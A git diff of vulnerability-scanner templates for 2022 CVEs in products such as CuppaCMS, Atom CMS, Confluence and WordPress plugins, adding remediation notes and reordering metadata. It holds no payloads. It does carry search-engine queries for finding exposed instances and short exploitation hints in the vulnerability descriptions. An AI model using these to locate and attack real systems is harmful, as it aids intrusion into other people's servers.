epss-percentile: 0.80599 + cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"ThinkPHP" + max-request: 1 vendor: thinkphp product: thinkphp + shodan-query: title:"ThinkPHP" tags: cve,cve2022,thinkphp,exposure,oss http: diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index ee38cf07aa..9345261d3c 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25485 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00878 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.80396 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 6c64a082bb..0f93b77498 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25486 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-25486 cwe-id: CWE-829 epss-score: 0.01337 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.84385 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index f9abeac88d..2bc0823c0b 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -6,22 +6,22 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. + remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html - https://github.com/thedigicraft/Atom.CMS/issues/256 - https://nvd.nist.gov/vuln/detail/CVE-2022-25487 - remediation: Fixed in version Atom CMS v2.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 epss-score: 0.82264 - cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.97952 + cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: thedigitalcraft product: atomcms tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index c5a8703e33..59bba62233 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. + remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 - https://nvd.nist.gov/vuln/detail/CVE-2022-25488 - remediation: Fixed in version Atom CMS v2.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 epss-score: 0.00942 - cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.81133 + cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: thedigitalcraft product: atomcms tags: cve,cve2022,sqli,atom,cms diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index dd1ec836c5..42ce0126ee 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -6,21 +6,21 @@ info: severity: medium description: | Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php. + remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/258 - https://nvd.nist.gov/vuln/detail/CVE-2022-25489 - remediation: Fixed in version Atom CMS v2.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 epss-score: 0.016 - cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.85784 + cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: thedigitalcraft product: atomcms tags: cve,cve2022,xss,atom,cms diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 425d220ab4..4984429de6 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25497 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-25497 cwe-id: CWE-552 epss-score: 0.00901 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.807 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa,intrusive diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 495f673e1b..24ff5db36a 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -6,27 +6,27 @@ info: severity: high description: | WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication. + remediation: Fixed in version 1.4.7.1. reference: - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0 - https://wordpress.org/plugins/duplicator/ - https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551 - https://nvd.nist.gov/vuln/detail/CVE-2022-2551 - remediation: Fixed in version 1.4.7.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 epss-score: 0.82414 - cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* epss-percentile: 0.9796 + cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: - max-request: 2 - google-query: inurl:/backups-dup-lite/dup-installer/ verified: true - framework: wordpress + max-request: 2 vendor: snapcreek product: duplicator + framework: wordpress + google-query: inurl:/backups-dup-lite/dup-installer/ tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 617b4def2d..34ce701b43 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. + remediation: | + Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef - https://wordpress.org/plugins/gotmls/advanced/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00078 - cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* epss-percentile: 0.32485 + cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall + framework: wordpress tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 3f38af7dc8..ec36fc432b 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. + remediation: | + Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-26134 cwe-id: CWE-917 epss-score: 0.97518 - cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.99975 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.component:"Atlassian Confluence" verified: true + max-request: 2 vendor: atlassian product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev http: diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index c376f99ff2..a8ec7b7274 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + remediation: | + Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. reference: - https://twitter.com/fluepke/status/1549892089181257729 - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-26138 cwe-id: CWE-798 epss-score: 0.97318 - cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* epss-percentile: 0.99809 + cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: questions_for_confluence + shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2022,confluence,atlassian,default-login,kev http: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index f0f7cfee0d..82ff1df4ce 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + remediation: | + Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: - https://2k8.org/post-319.html - https://security.netapp.com/advisory/ntap-20220425-0005/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-26148 cwe-id: CWE-312 epss-score: 0.10813 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.94349 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="Grafana" - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" + fofa-query: app="Grafana" tags: cve,cve2022,grafana,zabbix,exposure http: diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 0f3437c94e..5c266301bc 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -5,6 +5,8 @@ info: author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-26159 cwe-id: CWE-425 epss-score: 0.00665 - cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* epss-percentile: 0.77095 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ametys diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 40e3af431d..16d52cf675 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + remediation: | + Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. reference: - https://0day.today/exploit/37579 - http://seclists.org/fulldisclosure/2022/Apr/0 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-26233 cwe-id: CWE-22 epss-score: 0.00482 - cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* epss-percentile: 0.72843 + cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: barco diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index f571e5177c..804c77b987 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application. reference: - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.00111 - cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* epss-percentile: 0.4359 + cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true - google-query: inurl:/u8sl/WebHelp vendor: yonyou product: u8\+ + google-query: inurl:/u8sl/WebHelp tags: cve,cve2022,yonyou,xss headless: - steps: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 8be932d804..16c083034d 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -16,15 +16,15 @@ info: cve-id: CVE-2022-2627 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/themes/Newspaper" - framework: wordpress + max-request: 1 vendor: tagdiv product: newspaper + framework: wordpress + publicwww-query: "/wp-content/themes/Newspaper" tags: xss,wordpress,wp,wp-theme,newspaper,wpscan,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index f6afd12a1f..e34f752428 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server. + remediation: | + Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994 - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-2633 cwe-id: CWE-610,CWE-73 epss-score: 0.04403 - cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91307 + cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: plugins360 product: all-in-one_video_gallery + framework: wordpress tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery http: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 6704dad26d..4a1b284190 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-26352 cwe-id: CWE-22 epss-score: 0.97466 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* epss-percentile: 0.99936 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dotcms diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 641ea7e796..d924426d4a 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://rydzak.me/2022/04/cve-2022-26564/ - https://www.hoteldruid.com @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00109 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* epss-percentile: 0.43197 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.favicon.hash:-1521640213 vendor: digitaldruid product: hoteldruid + shodan-query: http.favicon.hash:-1521640213 tags: cve,cve2022,hoteldruid,xss http: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index e219de0ea5..5f11e1487b 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability. + remediation: | + Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue. reference: - https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1513 - https://nvd.nist.gov/vuln/detail/CVE-2022-26833 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-26833 cwe-id: CWE-306 epss-score: 0.01194 - cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* epss-percentile: 0.83396 + cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openautomationsoftware diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 2be2564b63..bf002511fb 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + remediation: | + Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-26960 cwe-id: CWE-22 epss-score: 0.93292 - cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* epss-percentile: 0.98708 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: std42 product: elfinder tags: cve,cve2022,lfi,elfinder diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 729ffc5b16..87678c5c1d 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1. + remediation: | + Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability. reference: - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2733 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2733 cwe-id: CWE-79 epss-score: 0.00175 - cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* epss-percentile: 0.53954 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"OpenEMR" verified: true + max-request: 2 vendor: open-emr product: openemr + shodan-query: title:"OpenEMR" tags: cve,cve2022,xss,openemr,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index f70cbc346b..97898c991a 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in 0.5.4.1. reference: - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/ - https://github.com/kareadita/kavita - https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4 - https://nvd.nist.gov/vuln/detail/CVE-2022-2756 - remediation: Fixed in 0.5.4.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-2756 cwe-id: CWE-918 epss-score: 0.00724 - cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* epss-percentile: 0.78253 + cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: title:"kavita" verified: true + max-request: 3 vendor: kavitareader product: kavita + shodan-query: title:"kavita" tags: ssrf,kavita,authenticated,huntr,cve,cve2022,intrusive http: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index c744f3980f..8ce344b44c 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later. + remediation: | + Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station. reference: - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593 - https://www.qnap.com/en/security-advisory/qsa-22-24 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-27593 cwe-id: CWE-610 epss-score: 0.56164 - cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* epss-percentile: 0.97221 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"QNAP" + max-request: 1 vendor: qnap product: photo_station + shodan-query: title:"QNAP" tags: cve,cve2022,qnap,lfi,kev http: diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index 96938300ce..a8ad2e74d7 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + remediation: | + Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. reference: - https://wordpress.org/plugins/simple-ajax-chat/#developers - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-27849 cwe-id: CWE-200 epss-score: 0.00654 - cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* epss-percentile: 0.76863 + cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - framework: wordpress vendor: plugin-planet product: simple_ajax_chat + framework: wordpress + google-query: inurl:/wp-content/plugins/simple-ajax-chat/ tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure http: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 8b5d6f3b8a..be1e1d9a6e 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters. + remediation: | + Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-27926 - https://wiki.zimbra.com/wiki/Security_Center @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-27926 cwe-id: CWE-79 epss-score: 0.93948 - cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* epss-percentile: 0.98805 + cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: zimbra product: collaboration tags: cve,cve2022,zimbra,xss,kev diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d42b4c642c..d38b2d17bf 100644 --- 